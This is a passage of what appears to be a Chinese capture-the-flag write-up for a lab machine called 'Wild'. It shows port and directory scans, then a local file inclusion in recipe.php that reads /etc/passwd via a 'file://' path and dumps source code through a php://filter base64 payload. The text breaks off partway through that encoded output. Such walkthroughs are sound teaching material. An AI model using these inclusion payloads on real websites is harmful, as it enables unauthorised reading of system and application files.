Wild

发表于 2024/03/29

作者 24 分钟阅读

wild

信息搜集

扫描开放端口

  
rustscan -a 10.0.2.14 -- -A -sC -sV

Open 10.0.2.14:22
Open 10.0.2.14:80
Open 10.0.2.14:8080
Open 10.0.2.14:8443
Open 10.0.2.14:9990

  
PORT     STATE SERVICE       REASON  VERSION
22/tcp   open  ssh           syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW/HgWpBe3FlvvdyW1IsS+o1NK/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=
|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt
80/tcp   open  http          syn-ack Apache httpd 2.4.57 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: burger html5 landing page
8080/tcp open  http-proxy    syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:16 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Connection: close
|     Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
|     Content-Length: 1590
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Date: Fri, 29 Mar 2024 03:43:16 GMT
|     <!--
|     Copyright The WildFly Authors
|     SPDX-License-Identifier: Apache-2.0
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <!-- proper charset -->
|     <meta http-equiv="content-type" content="text/html;charset=utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
|     <title>Welcome to WildFly</title>
|     <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
|     <link rel="StyleSheet" href="wildfly.css" type="text/css">
|     </head>
|     <body>
|     <div class="wrapper">
|     <div class="content">
|     <div class="logo">
|     <img src="wildfly_logo.png" alt="WildFly" border="0" />
|     </div>
|     <h1>Welcome to WildFly</h1>
|     <h3>Your WildFly instance is ru
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Allow: GET, HEAD, POST
|     Connection: close
|     Content-Length: 83
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:16 GMT
|     <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|_    Connection: close
|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3
|_http-title: Welcome to WildFly
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|_  Supported Methods: GET HEAD POST
8443/tcp open  ssl/https-alt syn-ack
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Supported Methods: GET HEAD POST
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:23 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Connection: close
|     Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
|     Content-Length: 1590
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Date: Fri, 29 Mar 2024 03:43:23 GMT
|     <!--
|     Copyright The WildFly Authors
|     SPDX-License-Identifier: Apache-2.0
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <!-- proper charset -->
|     <meta http-equiv="content-type" content="text/html;charset=utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
|     <title>Welcome to WildFly</title>
|     <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
|     <link rel="StyleSheet" href="wildfly.css" type="text/css">
|     </head>
|     <body>
|     <div class="wrapper">
|     <div class="content">
|     <div class="logo">
|     <img src="wildfly_logo.png" alt="WildFly" border="0" />
|     </div>
|     <h1>Welcome to WildFly</h1>
|     <h3>Your WildFly instance is ru
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Allow: GET, HEAD, POST
|     Connection: close
|     Content-Length: 83
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:23 GMT
|_    <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3
|_http-title: Welcome to WildFly
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-29T03:43:16
| Not valid after:  2034-03-27T03:43:16
| MD5:   896e:3042:e13c:a048:4a99:6339:e7d0:9feb
| SHA-1: 3740:baf7:37e4:30b2:4038:4393:e4d9:8569:15e5:1068
| -----BEGIN CERTIFICATE-----
| MIICyzCCAbWgAwIBAgIIFjRGS+M00V0wCwYJKoZIhvcNAQELMBQxEjAQBgNVBAMT
| CWxvY2FsaG9zdDAiGA8yMDI0MDMyOTAzNDMxNloYDzIwMzQwMzI3MDM0MzE2WjAU
| MRIwEAYDVQQDEwlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQCsITFeuqOZtIUa4TDf8RABcgCs87lJzejiTASjLZ6Z7CO/rAdDKWKQFOxF
| LU+YHemRsul+LhpgzojAhBuLbfxKZS+TWzVjekTQhDpaCISMgkLh5ZmAyNdFDRdH
| +SRXrOn2IvqWiKpzdVV5yrgpvByoQqsbMyW0SpERwfh2v2hHD25Waql6qz++I7EE
| H/ovgIxL36eShHDWBxrXIPZ2HWL0W91GwMhvV53jah25JvpVUYjs1Dx91Ar0otyy
| fnb1Di4Ytm+UUWa3e6+xoSgf7FSjCwmzL+Mjs9Sl6uXEuJc7BGauREei+J/yxvI1
| r19GTzClUI7kefM5uAkuIFGgWznjAgMBAAGjITAfMB0GA1UdDgQWBBS1Sixbvsns
| ozYrPxef7VwSTs3W6zALBgkqhkiG9w0BAQsDggEBAGW2B+T16gj+L1muXhpIHzR3
| f6HO7QAheFk6/zGHkLBiUyhp0XWnwnQ5/3z0xGABt0Jt6j8dnghIML25WgRtU+3W
| wIju0O2Sq+GnasY77ayFX9nCMAjPzu4I1mSi6ax/qfA8raJBpsyb1q9QVnz9aj24
| 29P80jUvcSCo0E6gue38OTKDQLvmsx+kxTIuDjK9EWKjrSiO7QgXGHMGTyEYasjK
| Fk2koAu4KdvH48I72jmdGvGmM5k1V+qk0s+wuIijAo2dsnoEKX3HZpCeeZeNRs5g
| NHt7jJHoS2HnU3OU0wAgEERpCYVLEq59FzxKf2C+J9IDf0R+2MUjHMxWGTJH/1I=
|_-----END CERTIFICATE-----
9990/tcp open  osm-appsrvr?  syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:36 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 302 Found
|     Connection: close
|     Location: /console/index.html
|     Content-Length: 0
|     Date: Fri, 29 Mar 2024 03:43:16 GMT
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     Connection: close
|     Content-Length: 83
|     Content-Type: text/html
|     Date: Fri, 29 Mar 2024 03:43:16 GMT
|_    <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/28%Time=660638D2%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r\nLast
SF:-Modified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nContent-L
SF:ength:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20bytes
SF:\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003:43:16\x20GMT\r\n\r\n<!--\n
SF:\x20\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x20SPDX-
SF:License-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20html>\n
SF:\n<html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20-->\n\x2
SF:0\x20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"text/htm
SF:l;charset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Com
SF:patible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<title>
SF:Welcome\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"shortc
SF:ut\x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n\x20\x
SF:20\x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x20type=
SF:\"text/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x20\x20\
SF:x20\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x20<div
SF:\x20class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\"\x20b
SF:order=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r(HTTPO
SF:ptions,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:\x20GE
SF:T,\x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2083\r\
SF:nContent-Type:\x20text/html\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003
SF::43:16\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>405\x
SF:20-\x20Method\x20Not\x20Allowed</body></html>")%r(RTSPRequest,42,"HTTP/
SF:1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x2
SF:0close\r\n\r\n")%r(FourOhFourRequest,C9,"HTTP/1\.1\x20404\x20Not\x20Fou
SF:nd\r\nConnection:\x20close\r\nContent-Length:\x2074\r\nContent-Type:\x2
SF:0text/html\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003:43:16\x20GMT\r\n
SF:\r\n<html><head><title>Error</title></head><body>404\x20-\x20Not\x20Fou
SF:nd</body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=3/28%Time=660638D8%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r
SF:\nLast-Modified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nCon
SF:tent-Length:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x2
SF:0bytes\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003:43:23\x20GMT\r\n\r\n
SF:<!--\n\x20\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x2
SF:0SPDX-License-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20h
SF:tml>\n\n<html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20--
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"te
SF:xt/html;charset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-
SF:UA-Compatible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<
SF:title>Welcome\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"
SF:shortcut\x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n
SF:\x20\x20\x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x2
SF:0type=\"text/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x2
SF:0\x20\x20\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<div\x20class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\
SF:"\x20border=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r
SF:(HTTPOptions,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:
SF:\x20GET,\x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2
SF:083\r\nContent-Type:\x20text/html\r\nDate:\x20Fri,\x2029\x20Mar\x202024
SF:\x2003:43:23\x20GMT\r\n\r\n<html><head><title>Error</title></head><body
SF:>405\x20-\x20Method\x20Not\x20Allowed</body></html>")%r(FourOhFourReque
SF:st,C9,"HTTP/1\.1\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nCont
SF:ent-Length:\x2074\r\nContent-Type:\x20text/html\r\nDate:\x20Fri,\x2029\
SF:x20Mar\x202024\x2003:43:23\x20GMT\r\n\r\n<html><head><title>Error</titl
SF:e></head><body>404\x20-\x20Not\x20Found</body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9990-TCP:V=7.94SVN%I=7%D=3/28%Time=660638D2%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:
SF:\x200\r\nConnection:\x20close\r\n\r\n")%r(GetRequest,80,"HTTP/1\.1\x203
SF:02\x20Found\r\nConnection:\x20close\r\nLocation:\x20/console/index\.htm
SF:l\r\nContent-Length:\x200\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003:4
SF:3:16\x20GMT\r\n\r\n")%r(HTTPOptions,DB,"HTTP/1\.1\x20405\x20Method\x20N
SF:ot\x20Allowed\r\nConnection:\x20close\r\nContent-Length:\x2083\r\nConte
SF:nt-Type:\x20text/html\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2003:43:16
SF:\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>405\x20-\x2
SF:0Method\x20Not\x20Allowed</body></html>")%r(RTSPRequest,42,"HTTP/1\.1\x
SF:20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close
SF:\r\n\r\n")%r(Help,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x200\r\nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,42,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20c
SF:lose\r\n\r\n")%r(TerminalServerCookie,42,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r(TLSSe
SF:ssionReq,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200
SF:\r\nConnection:\x20close\r\n\r\n")%r(Kerberos,42,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n")
SF:%r(SMBProgNeg,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:
SF:\x200\r\nConnection:\x20close\r\n\r\n")%r(FourOhFourRequest,C9,"HTTP/1\
SF:.1\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nContent-Length:\x2
SF:074\r\nContent-Type:\x20text/html\r\nDate:\x20Fri,\x2029\x20Mar\x202024
SF:\x2003:43:36\x20GMT\r\n\r\n<html><head><title>Error</title></head><body
SF:>404\x20-\x20Not\x20Found</body></html>")%r(LPDString,42,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20close\r
SF:\n\r\n")%r(LDAPSearchReq,42,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Length:\x200\r\nConnection:\x20close\r\n\r\n")%r(SIPOptions,42,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\
SF:x20close\r\n\r\n")%r(WMSRequest,42,"HTTP/1\.1\x20400\x20Bad\x20Request\
SF:r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

实地勘探

开放了80和8080，尝试访问一下：

还禁止右键，尝试一下ctrl+U，可以看到源代码了，但是没啥东西。

插件发现信息：

再看8080端口：

插件显示其信息是：

目录扫描

  
feroxbuster -u http://10.0.2.14 | awk '{print $1, $6}' 

http://10.0.2.14/images
http://10.0.2.14/images/logo.png
http://10.0.2.14/images/chicken.png
http://10.0.2.14/images/menu_bg.jpg
http://10.0.2.14/images/footer_logo.png
http://10.0.2.14/images/stamp.png
http://10.0.2.14/css/bootsnav.css
http://10.0.2.14/css/flaticon.css
http://10.0.2.14/css/custom.css
http://10.0.2.14/js/bootsnav.js
http://10.0.2.14/images/feature_bg.jpg
http://10.0.2.14/images/drinks_bg.jpg
http://10.0.2.14/images/small_slider_bg.jpg
http://10.0.2.14/images/classic_bg.jpg
http://10.0.2.14/images/large_slider_img.jpg
http://10.0.2.14/fonts
http://10.0.2.14/fonts/Flaticon.woff
http://10.0.2.14/fonts/Flaticon.svg
http://10.0.2.14/fonts/Flaticon.ttf
http://10.0.2.14/fonts/Flaticon.eot
http://10.0.2.14/js
http://10.0.2.14/js/main.js
http://10.0.2.14/css
http://10.0.2.14/css/animate.css
http://10.0.2.14/css/color.css
http://10.0.2.14/images/sign_bg.jpg
http://10.0.2.14/images/lock_bg.jpg
http://10.0.2.14/images/sides_bg.jpg
http://10.0.2.14/images/header_bg.jpg
http://10.0.2.14/js/gmaps.min.js
http://10.0.2.14/recipe.php
http://10.0.2.14/

以防万一再扫一下：

  
sudo dirsearch -u http://10.0.2.14 -e* -i 200,299-399 2>/dev/null

[23:58:03] 301 -  303B  - /js  ->  http://10.0.2.14/js/
[23:58:07] 301 -  309B  - /__MACOSX  ->  http://10.0.2.14/__MACOSX/
[23:58:08] 200 -    3B  - /about.php
[23:58:25] 301 -  304B  - /css  ->  http://10.0.2.14/css/
[23:58:30] 301 -  306B  - /fonts  ->  http://10.0.2.14/fonts/
[23:58:33] 200 -  653B  - /images/
[23:58:33] 301 -  307B  - /images  ->  http://10.0.2.14/images/
[23:58:36] 200 -  485B  - /js/

再扫描一下8080端口：

  
feroxbuster -u http://10.0.2.14:8080 | awk '{print $1, $6}' 

http://10.0.2.14:8080/wildfly.css
http://10.0.2.14:8080/favicon.ico
http://10.0.2.14:8080/jbosscommunity_logo_hori_white.png
http://10.0.2.14:8080/console
http://10.0.2.14:8080/wildfly_logo.png
http://10.0.2.14:8080/

sudo dirsearch -u http://10.0.2.14:8080 -e* -i 200,299-399 2>/dev/null

[00:01:13] 302 -    0B  - /console/  ->  http://10.0.2.14:9990/console
[00:01:13] 302 -    0B  - /console/j_security_check  ->  http://10.0.2.14:9990/console
[00:01:13] 302 -    0B  - /console/login/LoginForm.jsp  ->  http://10.0.2.14:9990/console
[00:01:13] 302 -    0B  - /console  ->  http://10.0.2.14:9990/console
[00:01:13] 302 -    0B  - /console/payments/config.json  ->  http://10.0.2.14:9990/console
[00:01:13] 302 -    0B  - /console/base/config.json  ->  http://10.0.2.14:9990/console
[00:01:18] 200 -    1KB - /favicon.ico

漏洞挖掘

查看敏感目录

http://10.0.2.14/recipe.php
# lol
http://10.0.2.14/about.php
# lol
http://10.0.2.14:8080/console

神魔情况

80端口一直加载不出来什么东西，要裂开了，鬼使神差的想换到vmware上试试，结果不出意料失败了，淦，倒是在virtualbox改为桥接以后，尝试可以打开了：

改为/recipe.php，发现了特殊界面：

文件包含

发现链接可能存在文件包含的漏洞：

http://10.161.16.19/recipe.php?file=fatty-burger.php

尝试目录穿越：

http://10.161.16.19/recipe.php?file=../../../../../etc/passwd

但是失败了：

Access denied !

尝试使用file协议读取：

http://10.161.16.19/recipe.php?file=file:///etc/passwd

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
tod:x:1002:1002:,,,:/home/tod:/bin/zsh

看到tod用户。

filter链提取文件

尝试使用filter提取出来recipe.php：

  
http://10.161.16.19/recipe.php?file=php://filter/read=convert.base64-encode/resource=recipe.php

CjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJmciI+CjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPkZvb2Q8L3RpdGxlPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIC8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuNi4zL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2ZsYXRpY29uLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2FuaW1hdGUuY3NzIj4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2Jvb3RzbmF2LmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9jb2xvci5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvY3VzdG9tLmNzcyIgLz4KPC9oZWFkPgo8Ym9keSBkYXRhLXNweT0ic2Nyb2xsIiBkYXRhLXRhcmdldD0iI25hdmJhci1tZW51IiBkYXRhLW9mZnNldD0iMTAwIj4KICAgIDxuYXYgY2xhc3M9Im5hdmJhciBuYXZiYXItZGVmYXVsdCBib290c25hdiBuby1iYWNrZ3JvdW5kIG5hdmJhci1maXhlZCBibGFjayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWhlYWRlciI+CiAgICAgICAgICAgICAgICA8YSBjbGFzcz0ibmF2YmFyLWJyYW5kIiBocmVmPSIjIj48aW1nIHNyYz0iaW1hZ2VzL2xvZ28ucG5nIiBjbGFzcz0ibG9nbyIgYWx0PSIiPjwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L25hdj4KICAgIDxzZWN0aW9uIGlkPSJibG9jayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC04IGNvbC1tZC1vZmZzZXQtMiI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZmVhdHVyZSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxoMT5XZWxjb21lICE8L2gxPgoJCQk8cCBzdHlsZT0iY29sb3I6IHJlZDsgZm9udC13ZWlnaHQ6IGJvbGQ7Zm9udC1zaXplOiAyNHB4OyI+Q2hvb3NlIGEgcmVjaXBlIDo8L3A+CiAgICAgICAgICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibGlzdC1ncm91cCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9ZmF0dHktYnVyZ2VyLnBocCI+RmF0dHkgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9c2hhY2stYnVyZ2VyLnBocCI+U2hhY2sgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9Y2hlZGRhci1idXJnZXIucGhwIj5DaGVkZGFyIEp1bmt5IFN0dWZmZWQgQnVyZ2VyczwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9zZWN0aW9uPgoKICAgIDxzY3JpcHQgc3JjPSJodHRwOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjEubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJqcy9ib290c25hdi5qcyI+PC9zY3JpcHQ+CjwvYm9keT4KPC9odG1sPgoKCjw/cGhwCmluaV9zZXQoJ2FsbG93X3VybF9pbmNsdWRlJywgJzAnKTsKCmZ1bmN0aW9uIGlzRm9yYmlkZGVuKCRpbnB1dCkgewogICAgcmV0dXJuIHN0cmlwb3MoJGlucHV0LCAiaWNvbnYiKSAhPT0gZmFsc2U7Cn0KCmlmKGlzc2V0KCRfR0VUWydmaWxlJ10pKSB7CiAgICAkZmlsZSA9ICRfR0VUWydmaWxlJ107CgogICAgaWYgKGlzRm9yYmlkZGVuKCRmaWxlKSkgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWxlcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfSBlbHNlaWYgKHN0cm5jbXAoJGZpbGUsICIvIiwgMSkgIT09IDAgJiYgc3RybmNtcCgkZmlsZSwgIi4uIiwgMikgIT09IDApIHsKICAgICAgICBAaW5jbHVkZSgkZmlsZSk7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWx